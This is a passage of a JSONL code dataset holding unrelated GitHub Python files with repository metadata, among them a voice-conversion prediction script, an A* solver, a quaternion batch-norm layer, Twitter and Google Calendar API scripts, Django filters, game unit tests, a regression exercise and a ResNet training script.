NUM_LAYERS, LEARNING_RATE, BATCH_SIZE, KEEP_PROB)\n try:\n saver.restore(sess, SAVE_PATH)\n print(\"Model restored.\\n\")\n except:\n # initialise the variables\n sess.run(init_op)\n print(\"Model initialised.\\n\")\n\n predict_inputs = load_test_data(predict_file)\n predict_inputs = np.array(predict_inputs).astype(int)\n\n predict_inputs = np.asarray([one_hot(x) for x in predict_inputs])\n\n num_examples = len(predict_inputs)\n predict_seq_len = [len(x) for x in predict_inputs]\n\n feed = {inputs: predict_inputs,\n seq_len: predict_seq_len,\n keep_prob: 1.0}\n\n outputs = sess.run(scaled_predictions, feed)\n\n print(outputs[0].shape)\n\n audio = spectrogram2wav(np.e**(outputs[0]).T, \n n_fft=hp.Default.n_fft, \n win_length=hp.Default.win_length, \n hop_length=hp.Default.hop_length,\n num_iters=hp.Default.n_iter)\n librosa.output.write_wav(\n \"SA1_pred.wav\", audio, hp.Default.sr, norm=True)\n","repo_name":"nihal111/voice-conversion","sub_path":"predict2mag.py","file_name":"predict2mag.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"6622601852","text":"def search(ls):\n val = int ( input('Enter the number for search -> '))\n\n flag = False\n found = 0\n\n for i in ls:\n if i == val:\n flag = True\n found=i\n if flag:\n print('Found at ',found)\n else:\n print('Not Found')\n\nsearch([1,2,3,4,5,6,7,8])","repo_name":"shamsunnisa/Python-code","sub_path":"test/search from list.py","file_name":"search from list.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39476039916","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\ntry:\n from netdisp import NetDisp\nexcept ImportError as e:\n raise RuntimeError(\"Could not import netdisp, make sure its installed or \"\n \"that the exports are sourced\") from e\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=\"NetDisp Notification\")\n parser.add_argument('ip', type=str, help=\"The IP of the netdisp\")\n parser.add_argument('port', type=int, help=\"The port of the netdisp\")\n 
return parser.parse_args(args)\n\n\ndef main(args):\n    args = parse_args(args)\n\n    netdisp = NetDisp(args.ip, args.port)\n\n    # Create a notification; this will override what is currently shown without\n    # switching the view. Everything until the view is ended will be part of\n    # the notification.\n    netdisp.create_notification(timeout_ms=1000).draw_rect(\n        (0, 0), 128-1, 64-1).show_text(\"\\n~Notification\").end_view().send()\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","repo_name":"Manewing/netdisp","sub_path":"examples/gui/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"24001139678","text":"def history_recall(singlestate, previous_states):\n    #print(singlestate)\n    current_state=previous_states[singlestate]\n    state_history=[]\n    state_history.append(current_state)\n    if(current_state!=\"ORIGIN\"):\n        state_history+=history_recall(current_state, previous_states)\n    return state_history\n\ndef solve(original, goal, generate_sequence, get_priority):\n    history={}\n    gamestates=[]\n    gamestates.append([original, get_priority(original, goal)])\n    history[original]=\"ORIGIN\"\n    exploredstates=1\n    Done=False\n    \n    while(not Done):\n        lead_state=gamestates.pop(0)\n        pics=generate_sequence(lead_state[0])\n        exploredstates+=1\n        new_states=[]\n        for pic in pics:\n            if(not(pic in history)):\n                history[pic]=lead_state[0]\n                new_states.append([pic, get_priority(pic, goal)]) \n        gamestates+=new_states\n        gamestates.sort(key=lambda x : x[1])\n        if(gamestates[0][0]==goal):\n            Done=True\n        statelength=len(gamestates)\n        if(exploredstates % 1000 == 0 and exploredstates > 999):\n            print(\"\\n Program is not frozen. Has currently checked: \", exploredstates, \" states\")\n            print(\"(\", statelength,\" states in queue)\")\n            if(statelength==0):\n                print(\"No solution detected. 
Press Ctrl+c to abort\")\n \n final_solution=history_recall(gamestates[0][0], history)\n final_solution.reverse()\n final_solution.pop(0)\n final_solution.append(gamestates[0][0])\n #print(final_solution)\n exploredstates+=1\n return final_solution, exploredstates\n","repo_name":"agraubert/8-Board_solver","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22479030083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 14 00:39:36 2020\r\n\r\n@author: Edoardo\r\n\"\"\"\r\n\r\nimport torch\r\nfrom torch.nn import Module, Parameter\r\n# import math\r\n\r\ndef moving_average_update(statistic, curr_value, momentum):\r\n \r\n new_value = (1 - momentum) * statistic + momentum * curr_value\r\n \r\n return new_value.data\r\n\r\nclass QuaternionBatchNorm2d(Module):\r\n r\"\"\"Applies a 2D Quaternion Batch Normalization to the incoming data.\r\n \"\"\"\r\n\r\n def __init__(self, num_features, gamma_init=1., beta_param=True, momentum=0.1):\r\n super(QuaternionBatchNorm2d, self).__init__()\r\n self.num_features = num_features // 4\r\n self.gamma_init = gamma_init\r\n self.beta_param = beta_param\r\n self.gamma = Parameter(torch.full([1, self.num_features, 1, 1], self.gamma_init))\r\n self.beta = Parameter(torch.zeros(1, self.num_features * 4, 1, 1), requires_grad=self.beta_param)\r\n self.eps = torch.tensor(1e-5)\r\n \r\n self.register_buffer('moving_var', torch.ones(1) )\r\n self.register_buffer('moving_mean', torch.zeros(4))\r\n self.momentum = momentum\r\n\r\n def reset_parameters(self):\r\n self.gamma = Parameter(torch.full([1, self.num_features, 1, 1], self.gamma_init))\r\n self.beta = Parameter(torch.zeros(1, self.num_features * 4, 1, 1), requires_grad=self.beta_param)\r\n\r\n def forward(self, input):\r\n # print(self.training)\r\n if self.training:\r\n quat_components = torch.chunk(input, 4, dim=1)\r\n \r\n r, i, j, k = quat_components[0], quat_components[1], quat_components[2], quat_components[3]\r\n \r\n mu_r = torch.mean(r)\r\n mu_i = torch.mean(i)\r\n mu_j = torch.mean(j)\r\n mu_k = torch.mean(k)\r\n mu = torch.stack([mu_r,mu_i, mu_j, mu_k], dim=0)\r\n # print('mu shape', mu.shape)\r\n \r\n delta_r, delta_i, delta_j, delta_k = r - mu_r, i - mu_i, j - mu_j, k - mu_k\r\n \r\n quat_variance = torch.mean(delta_r**2 + delta_i**2 + delta_j**2 + delta_k**2)\r\n var = quat_variance\r\n denominator = torch.sqrt(quat_variance + self.eps)\r\n \r\n # Normalize\r\n r_normalized = delta_r / denominator\r\n i_normalized = delta_i / denominator\r\n j_normalized = delta_j / denominator\r\n k_normalized = delta_k / denominator\r\n \r\n beta_components = torch.chunk(self.beta, 4, dim=1)\r\n \r\n # Multiply gamma (stretch scale) and add beta (shift scale)\r\n new_r = (self.gamma * r_normalized) + beta_components[0]\r\n new_i = (self.gamma * i_normalized) + beta_components[1]\r\n new_j = (self.gamma * j_normalized) + beta_components[2]\r\n new_k = (self.gamma * k_normalized) + beta_components[3]\r\n \r\n new_input = torch.cat((new_r, new_i, new_j, new_k), dim=1)\r\n \r\n\r\n # with torch.no_grad():\r\n self.moving_mean.copy_(moving_average_update(self.moving_mean.data, mu.data, self.momentum))\r\n self.moving_var.copy_(moving_average_update(self.moving_var.data, var.data, self.momentum))\r\n \r\n # print(var, self.moving_var)\r\n\r\n \r\n return new_input\r\n \r\n else:\r\n with torch.no_grad():\r\n # print(input.shape, self.moving_mean.shape)\r\n r,i,j,k 
= torch.chunk(input, 4, dim=1)\r\n quaternions = [r,i,j,k]\r\n output = []\r\n denominator = torch.sqrt(self.moving_var + self.eps)\r\n beta_components = torch.chunk(self.beta, 4, dim=1)\r\n # print(torch.tensor(quaternions).shape)\r\n # print(quaternions[0].shape, self.moving_mean.shape, self.moving_var.shape, torch.squeeze(self.beta).shape)\r\n for q in range(4):\r\n new_quat = self.gamma * ( (quaternions[q] - self.moving_mean[q]) / denominator ) + beta_components[q]\r\n output.append(new_quat)\r\n output = torch.cat(output, dim=1)\r\n\r\n return output \r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + '(' \\\r\n + 'num_features=' + str(self.num_features) \\\r\n + ', gamma=' + str(self.gamma.shape) \\\r\n + ', beta=' + str(self.beta.shape) \\\r\n + ', eps=' + str(self.eps.shape) + ')'\r\n \r\n \r\n \r\n \r\n \r\n# class model(torch.nn.Module):\r\n# def __init__(self):\r\n# super(model, self).__init__()\r\n# self.l = torch.nn.Linear(4,4)\r\n# self.b = QuaternionBatchNorm2d(4)\r\n# def forward(self, x):\r\n# return self.b(self.l(x))\r\n# x = torch.ones(2, 4).to('cuda')\r\n# # L = torch.nn.Linear(4,4).to('cuda')(x)\r\n# # # print(model)\r\n# # B = QuaternionBatchNorm2d(4).to('cuda').eval()(L)\r\n# # model = B\r\n# model = model().to('cuda')\r\n# model.eval()\r\n# # print(model.moving_var)\r\n# y = model(x)\r\n# print(y) \r\n\r\n# loss = y - torch.ones(2,4).to('cuda') \r\n\r\n# loss.backward() \r\n ","repo_name":"eleGAN23/QGAN","sub_path":"utils/QBN_Vecchi2.py","file_name":"QBN_Vecchi2.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"37317228785","text":"David_luiz ={'first name':'David','last name':'Theuri','age':18,'city':'Nairobi'}\r\nEugine={'first name':'Eugine','last name':'Kaigai','age':19,'city':'Nanyuki'}\r\nFredy={'first name':'fredrick','last name':'Kangangi','age':20,'city':'Nakuru'}\r\n\r\npeople=[David_luiz,Eugine,Fredy]\r\nfor person in people:\r\n\tprint(person)\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n","repo_name":"Muchiri-cmd/PythonCrashCourse","sub_path":"friendslist.py","file_name":"friendslist.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42030130243","text":"SCOPES = ['https://www.googleapis.com/auth/calendar']\ndef prepare_credentials():\n # 'token.pickle'というファイルに認証結果を保存しておき\n # 認証がすでにされている場合はスキップする、という処理を行なっています。\n import pickle\n import os.path\n from google.oauth2 import service_account\n from google.auth.transport.requests import Request\n creds = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n creds = service_account.Credentials.from_service_account_file(\n 'credentials.json', scopes=SCOPES)\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\nfrom googleapiclient.discovery import build\nfrom datetime import datetime, timedelta\n\nCALENDAR_ID = '<<カレンダーID>>'\ncreds = prepare_credentials()\nservice = build('calendar', 'v3', credentials=creds)\n\nevent_start = datetime(2019, 1, 1, 12, 0)\nevent_end = event_start + timedelta(hours=1)\n# 予定の内容を準備します\nevent_body = {\n 'summary': '予定のタイトル',\n 'description': '予定の詳細な説明',\n 'start': {'dateTime': event_start.astimezone().isoformat()},\n 'end': {'dateTime': 
event_end.astimezone().isoformat()},\n 'location': 'イベントの場所'\n}\n# CALENDAR_IDで指定されるカレンダーに予定を追加します。\nservice.events().insert(calendarId=CALENDAR_ID, body=event_body).execute()\n","repo_name":"shige-horiuchi/auto","sub_path":"Python自動処理sample/chapter11/calendar_insert_event.py","file_name":"calendar_insert_event.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46350305274","text":"import unittest\nfrom src.war_unit import WarUnit\nfrom src.weapon import Weapon\nfrom src.spell import Spell\nfrom src.hero import Hero\nfrom src.enemy import Enemy\n\n\nclass TestWarUnit(unittest.TestCase):\n def setUp(self):\n self.hero = Hero(health=100, mana=50,\n name=\"Yamamoto\", title=\"Samurai\", mana_regeneration_rate=2)\n self.enemy = Enemy(health=100, mana=100, damage=20)\n\n def test_is_alive(self):\n with self.subTest(\"Test if hero is alive\"):\n self.assertTrue(self.hero.is_alive())\n\n self.hero.health = 0\n\n with self.subTest(\"Test if hero is dead\"):\n self.assertFalse(self.hero.is_alive())\n\n def test_get_health(self):\n self.assertEqual(self.hero.get_health(), 100)\n\n def test_get_mana(self):\n self.assertEqual(self.hero.get_mana(), 50)\n\n def test_take_damage(self):\n with self.subTest(\"Test reduce the hero's health by damage\"):\n self.hero.take_damage(10.5)\n # hero_healyh = self.hero.get_health()\n self.assertEqual(self.hero.get_health(), 89.5)\n\n with self.subTest(\"Test reduce the hero's health to negative value\"):\n self.hero.take_damage(200)\n # hero_healyh = self.hero.get_health()\n self.assertEqual(self.hero.get_health(), 0)\n\n with self.subTest(\"Damage_points is positive\"):\n with self.assertRaises(ValueError):\n self.hero.take_damage(-10)\n\n with self.subTest(\"Damage_points is int or float\"):\n with self.assertRaises(TypeError):\n self.hero.take_damage(\"10.5\")\n\n def test_take_healing(self):\n with self.subTest(\"healing_points is positive\"):\n with self.assertRaises(AssertionError):\n self.hero.take_healing(-10)\n\n with self.subTest(\"Type of healing_points is int or float\"):\n with self.assertRaises(TypeError):\n self.hero.take_healing(\"10\")\n\n with self.subTest(\"Try to heal dead hero\"):\n self.hero.health = 0\n self.assertFalse(self.hero.take_healing(10))\n # back the hero health\n\n self.hero.health = 50\n with self.subTest(\"Try to heal hero with more than the max possible healing_points\"):\n self.hero.take_healing(200)\n self.assertEqual(self.hero.get_health(), self.hero._max_health)\n\n with self.subTest(\"Is the hero's health is max possible health after the last healing - 200 points\"):\n self.assertEqual(self.hero.health, self.hero._max_health)\n\n def test_attack(self):\n weapon = Weapon(name=\"bow\", damage=10)\n spell = Spell(name=\"Fireball\", damage=30, mana_cost=50, cast_range=2)\n gun = Weapon(name=\"gun\", damage=40)\n ice = Spell(name=\"Ice\", damage=50, mana_cost=50, cast_range=1)\n self.hero.equip(weapon)\n self.hero.learn(spell)\n\n with self.subTest(\"Hero attack with spell.damage > weapon.damage\"):\n self.assertEqual(self.hero.attack(), spell.damage)\n\n with self.subTest(\"Hero attack with weapon if hero dont know spell\"):\n self.hero.weapon = None\n self.assertEqual(self.hero.attack(), spell.damage)\n\n with self.subTest(\"Enemy attack with only damage\"):\n self.assertEqual(self.enemy.attack(), self.enemy.damage)\n\n with self.subTest(\"Enemy attack with weapon\"):\n self.enemy.equip(gun)\n 
self.assertEqual(self.enemy.attack(), gun.damage)\n\n        with self.subTest(\"Attack method by weapon\"):\n            self.hero.equip(weapon)\n            self.assertEqual(self.hero.attack(by=\"weapon\"), 10)\n\n        with self.subTest(\"Attack method by spell\"):\n            self.assertEqual(self.hero.attack(by=\"spell\"), 30)\n\n        with self.subTest(\"Try to attack with non-existent weapon\"):\n            self.hero.weapon = None\n            self.assertEqual(self.hero.attack(by=\"weapon\"), 0)\n\n        with self.subTest(\"Try to attack with spell if hero's mana is lower than the Spell.mana_cost\"):\n            with self.assertRaises(ValueError):\n                self.hero.attack(by=\"spell\")\n\n    def test_take_mana(self):\n        self.hero.take_mana(100)\n        self.assertEqual(self.hero.mana, 50)\n\n    def test_known_as(self):\n        self.assertEqual(self.hero.known_as(), \"Yamamoto the Samurai\")\n\n    def tearDown(self):\n        self.hero = WarUnit(row=0, col=0, health=100, mana=50)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"hatanasov/Dungeons-Pythons","sub_path":"tests/test_war_unit.py","file_name":"test_war_unit.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"3402279001","text":"import os\n\nprint(\"Hello world\")\n\ndef tictactoe():\n\tpass\n\ndef menu():\n\n\tb = True\n\n\tos.system('clear')\n\tprint(\"\\n Please make your selection :\")\n\tprint(\"\\n \")\n\tprint(\"\\n 0 : Continue\")\n\tprint(\"\\n 1 : Tic-Tac-Toe\")\n\tprint(\"\\n 2 : Exit\")\n\n\ta = input(\"make your selection\")\n\n\tif a == \"2\":\n\t\tb = False\n\telif a == \"1\":\n\t\ttictactoe()\n\n\treturn b\n\n\nflag = True\n\nwhile flag:\n\tflag = menu()\n","repo_name":"ravenpuk/pythonTesting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"26683505454","text":"#! 
/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport csv\nfrom twython import Twython\n\nimport settings as s\n\ntwitter = Twython(s.APP_KEY, s.APP_SECRET, s.OAUTH_TOKEN, s.OAUTH_TOKEN_SECRET)\ntweets = twitter.search(q='삼성', count=100)\n\nprint(tweets)\n\ndata = [(t['user']['screen_name'], t['text'], t['created_at']) for t in tweets['statuses']]\n\nwith open('tweets.csv', 'w', encoding='utf-8') as f:\n writer = csv.writer(f)\n writer.writerows(data)\n","repo_name":"e9t/courses-code","sub_path":"twitter/get_twitter.py","file_name":"get_twitter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3044113638","text":"import django_filters\nfrom dal import autocomplete\nfrom django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\n\nfrom pola.company.models import Company\nfrom pola.filters import CrispyFilterMixin\nfrom pola.product.models import Product\n\nfrom .models import Report\n\n\nclass StatusFilter(django_filters.ChoiceFilter):\n def __init__(self, *args, **kwargs):\n if 'label' not in kwargs:\n kwargs['label'] = _('Status')\n super().__init__(*args, **kwargs)\n self.extra['choices'] = (('', '---------'), ('open', _('Otwarte')), ('resolved', _('Rozpatrzone')))\n\n def filter(self, qs, value):\n if value == 'open':\n return qs.only_open()\n if value == 'resolved':\n return qs.only_resolved()\n return qs\n\n\ndef is_bot_client(queryset, name, value):\n if value:\n return queryset.filter(client='krs-bot')\n else:\n return queryset.filter(~Q(client='krs-bot'))\n\n\nclass ReportFilter(CrispyFilterMixin, django_filters.FilterSet):\n status = StatusFilter()\n product = django_filters.ModelChoiceFilter(\n queryset=Product.objects.all(), widget=autocomplete.ModelSelect2(url='product:product-autocomplete')\n )\n product__company = django_filters.ModelChoiceFilter(\n queryset=Company.objects.all(), widget=autocomplete.ModelSelect2(url='company:company-autocomplete')\n )\n is_bot_client = django_filters.BooleanFilter(\n field_name='client', method=is_bot_client, label='Pokaż zgłoszenia od bota'\n )\n\n o = django_filters.OrderingFilter(\n # tuple-mapping retains order\n fields=(\n ('created', _('Data utowrzenia')),\n ('resolved_at', _('Data rozpatrzenia')),\n ('resolved_by', _('Rozpatrujący')),\n )\n )\n\n class Meta:\n model = Report\n fields = [\n 'status',\n 'product',\n 'product__company',\n 'client',\n 'created',\n 'resolved_at',\n 'resolved_by',\n ]\n","repo_name":"KlubJagiellonski/pola-backend","sub_path":"pola/report/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"21326491446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 2 12:13:32 2023\r\n\r\n@author: Sai khairnar\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndataset=pd.read_csv('C:/Users/ABC/Documents/Business_analytics_python/DATA/Real estate.csv')\r\n\r\ndataset.drop([\"No\",],axis=1,inplace=True)\r\ndataset.head(5)\r\n\r\nx=dataset.iloc[:,[0,1,2,3,4,5]]\r\ny=dataset.iloc[:,-1]\r\n \r\n \r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,train_size=0.3,random_state=0)\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(x_train, y_train)\r\n\r\nregressor.coef_\r\n\r\nregressor.intercept_\r\n\r\ny_pred = regressor.predict(x_test)\r\n\r\nfrom 
sklearn.metrics import r2_score\r\nr2_score(y_test, y_pred)\r\n\r\nimport statsmodels.api as sm\r\n\r\nimport numpy as nm\r\nx = nm.append(arr = nm.ones((414,1)).astype(int), values=x, axis=1)\r\n\r\nx_opt=x[:, [ 0,1,2,3,4,5,6]]\r\n\r\nregressor_OLS=sm.OLS(endog = y, exog=x_opt).fit()\r\n\r\n#We will use summary() method to get the summary table of all the variables.\r\nregressor_OLS.summary()\r\n#-------------------------------------------------\r\nx_opt=x[:, [ 0,1,2,3,4,5]]\r\n\r\nregressor_OLS=sm.OLS(endog = y, exog=x_opt).fit()\r\n\r\n#We will use summary() method to get the summary table of all the variables.\r\nregressor_OLS.summary()\r\n\r\n\r\ndata_set= pd.read_csv('C:/Users/ABC/Documents/Business_analytics_python/DATA/Real estate.csv') \r\n#Extracting Independent and dependent Variable \r\nx_BE= data_set.iloc[:,[0,1,2,3,4,5]].values\r\ny_BE= data_set.iloc[:,-1].values \r\n# Splitting the dataset into training and test set. \r\nfrom sklearn.model_selection import train_test_split\r\nx_BE_train, x_BE_test, y_BE_train, y_BE_test= train_test_split(x_BE, y_BE, test_size= 0.2, random_state=0)\r\n\r\n#Fitting the MLR model to the training set: \r\nfrom sklearn.linear_model import LinearRegression\r\nregressor= LinearRegression()\r\nregressor.fit(x_BE_train, y_BE_train)\r\n\r\n#Predicting the Test set result;\r\ny_pred= regressor.predict(x_BE_test)\r\n\r\n#Cheking the score \r\n#Calculating the r squared value:\r\nfrom sklearn.metrics import r2_score\r\nr2_score(y_BE_test,y_pred)\r\n#The above score tells that our model is now more accurate with the test dataset with\r\n#accuracy equal to 65%\r\n\r\n#Calculating the coefficients:\r\nprint(regressor.coef_)\r\n\r\n#Calculating the intercept:\r\nprint(regressor.intercept_)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saikhairnar20023/machine_learning_code","sub_path":"Real estate_regression_backword elimination.py","file_name":"Real estate_regression_backword elimination.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15459878512","text":"#!/usr/bin/env python\n\nimport os\nfrom datetime import datetime\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport resnet\n\n\ntf.app.flags.DEFINE_boolean('is_Server', True, \"\"\"If is for server\"\"\")\ntf.app.flags.DEFINE_boolean('is_Train', True, \"\"\"If is for training\"\"\")\ntf.app.flags.DEFINE_boolean('is_Simple',False,\"\"\"Test on simple model\"\"\")\n# Network Configuration\ntf.app.flags.DEFINE_integer('batch_size', 128, \"\"\"Number of images to process in a batch.\"\"\")\ntf.app.flags.DEFINE_integer('num_gpus', 2, \"\"\"Number of GPUs.\"\"\")\n\n# Optimization Configuration\ntf.app.flags.DEFINE_float('l2_weight', 0.0001, \"\"\"L2 loss weight applied all the weights\"\"\")\ntf.app.flags.DEFINE_float('momentum', 0.9, \"\"\"The momentum of MomentumOptimizer\"\"\")\ntf.app.flags.DEFINE_float('initial_lr', 0.0001, \"\"\"Initial learning rate\"\"\")\n\ntf.app.flags.DEFINE_float('lr_decay', 0.5, \"\"\"Learning rate decay factor\"\"\")\ntf.app.flags.DEFINE_boolean('finetune', False, \"\"\"Whether to finetune.\"\"\")\n\n\ntf.app.flags.DEFINE_integer('dim_output',185,\"\"\"output dimension\"\"\")\n\n# Training Configuration\ntf.app.flags.DEFINE_string('train_dir', './train', \"\"\"Directory where to write log and checkpoint.\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 300000, \"\"\"Number of batches to 
run.\"\"\")\ntf.app.flags.DEFINE_integer('display', 10, \"\"\"Number of iterations to display training info.\"\"\")\ntf.app.flags.DEFINE_integer('checkpoint_interval', 10000, \"\"\"Number of iterations to save parameters as a checkpoint\"\"\")\ntf.app.flags.DEFINE_float('gpu_fraction', 0.8, \"\"\"The fraction of GPU memory to be allocated\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False, \"\"\"Whether to log device placement.\"\"\")\ntf.app.flags.DEFINE_string('basemodel', None, \"\"\"Base model to load paramters\"\"\")\ntf.app.flags.DEFINE_string('checkpoint', None, \"\"\"Model checkpoint to load\"\"\")\n\nFLAGS = tf.app.flags.FLAGS\n\nif(FLAGS.is_Simple==True):\n os.chdir(\"/home/song/Desktop/Code/SS_MultiView_face/\")\nelse:\n if(FLAGS.is_Server==True):\n os.chdir(\"/home/guoxian/Coarse_3DMM/\")\n else:\n os.chdir(\"/media/songguoxian/DATA/UnixFolder/3DMM/Coarse_Dataset/Coarse_Dataset/\")\n\n\ndef get_lr(initial_lr, lr_decay, one_epoch_step, global_step):\n times_= int(global_step/one_epoch_step)\n return initial_lr*pow(lr_decay,times_)\n\n\n\n\ndef train():\n\n def Load():\n if(FLAGS.is_Simple):\n train_data = np.load(\"Input/test_data.npy\")\n train_label = np.load(\"Input/test_label.npy\")\n else:\n train_data = np.load(\"Input/train_data.npy\")\n train_label = np.load(\"Input/train_label.npy\")\n test_data = np.load(\"Input/test_data.npy\")\n test_label = np.load(\"Input/test_label.npy\")\n mean_data = np.load(\"Input/mean_data.npy\")\n mean_label = np.load(\"Input/mean_label.npy\")\n std_label = np.load(\"Input/std_label.npy\")\n\n\n permutation = np.random.permutation(train_data.shape[0])\n train_images=train_data[permutation,:,:,:]\n train_labels=train_label[permutation,:]\n\n return train_images,train_labels,test_data,test_label,mean_data,mean_label,std_label\n\n\n with tf.Graph().as_default():\n init_step = 0\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n X = tf.placeholder(tf.float32, [None, 224,224,3], name='Input_Images')\n Y = tf.placeholder(tf.float32, [None, FLAGS.dim_output], name='Input_labels')\n\n # Build model\n hp = resnet.HParams(batch_size=FLAGS.batch_size,\n num_gpus=FLAGS.num_gpus,\n num_output=FLAGS.dim_output,\n weight_decay=FLAGS.l2_weight,\n momentum=FLAGS.momentum,\n finetune=FLAGS.finetune)\n\n network_train = resnet.ResNet(hp, X, Y, global_step, name=\"train\")\n network_train.build_model()\n network_train.build_train_op()\n train_summary_op = tf.summary.merge_all() # Summaries(training)\n print('Number of Weights: %d' % network_train._weights)\n print('FLOPs: %d' % network_train._flops)\n\n\n # Build an initialization operation to run below.\n init = tf.global_variables_initializer()\n print(\"sess 0\")\n # Start running operations on the Graph.\n sess = tf.Session(config=tf.ConfigProto(\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_fraction),\n allow_soft_placement=False,\n # allow_soft_placement=True,\n log_device_placement=FLAGS.log_device_placement))\n print(\"sess 1\")\n sess.run(init)\n print(\"sess done\")\n # Create a saver.\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=2)\n # if FLAGS.checkpoint is not None:\n # print('Load checkpoint %s' % FLAGS.checkpoint)\n # saver.restore(sess, FLAGS.checkpoint)\n # init_step = global_step.eval(session=sess)\n # # elif FLAGS.basemodel:\n # # # Define a different saver to save model checkpoints\n # # print('Load parameters from basemodel %s' % FLAGS.basemodel)\n # # variables = tf.global_variables()\n # # vars_restore = [var for 
var in variables\n # # if not \"Momentum\" in var.name and\n # # not \"global_step\" in var.name]\n # # saver_restore = tf.train.Saver(vars_restore, max_to_keep=10)\n # # saver_restore.restore(sess, FLAGS.basemodel)\n # else:\n # print('No checkpoint file of basemodel found. Start from the scratch.')\n\n\n if not os.path.exists(FLAGS.train_dir):\n os.mkdir(FLAGS.train_dir)\n summary_writer = tf.summary.FileWriter(os.path.join(FLAGS.train_dir, str(global_step.eval(session=sess))),\n sess.graph)\n\n # Training!\n train_images, train_labels, test_data, test_label, mean_data, mean_label,std_label= Load()\n one_epoch_step =int(len(train_labels)/FLAGS.batch_size)\n train_images = (train_images-mean_data)/255.0\n train_labels = (train_labels-mean_label)/std_label\n\n test_data = (test_data-mean_data)/ 255.0\n test_label= (test_label - mean_label) /std_label\n print(\"data done\")\n for step in range(init_step, FLAGS.max_steps):\n\n offset = (step * FLAGS.batch_size) % (train_labels.shape[0] - FLAGS.batch_size)\n batch_data = train_images[offset:(offset + FLAGS.batch_size), :, :,:]\n batch_labels = train_labels[offset:(offset + FLAGS.batch_size), :]\n # Train\n lr_value = get_lr(FLAGS.initial_lr, FLAGS.lr_decay, one_epoch_step, step)\n start_time = time.time()\n _, loss_value, train_summary_str = \\\n sess.run([network_train.train_op, network_train.loss, train_summary_op],\n feed_dict={network_train.is_train:True, network_train.lr:lr_value,X:batch_data,Y:batch_labels})\n duration = time.time() - start_time\n\n assert not np.isnan(loss_value)\n\n # Display & Summary(training)\n if step % FLAGS.display == 0 or step < 10:\n num_examples_per_step = FLAGS.batch_size * FLAGS.num_gpus\n examples_per_sec = num_examples_per_step / duration\n sec_per_batch = float(duration)\n format_str = ('%s: (Training) step %d, loss=%.4f, lr=%f (%.1f examples/sec; %.3f '\n 'sec/batch)')\n print (format_str % (datetime.now(), step, loss_value, lr_value,\n examples_per_sec, sec_per_batch))\n\n elapse = time.time() - start_time\n time_left = (FLAGS.max_steps - step) * elapse\n print(\"\\tTime left: %02d:%02d:%02d\" %\n (int(time_left / 3600), int(time_left % 3600 / 60), time_left % 60))\n\n summary_writer.add_summary(train_summary_str, step)\n\n # Save the model checkpoint periodically.\n if (step > init_step and step % FLAGS.checkpoint_interval == 0) or (step + 1) == FLAGS.max_steps:\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n train()\n\n\nif __name__ == '__main__':\n 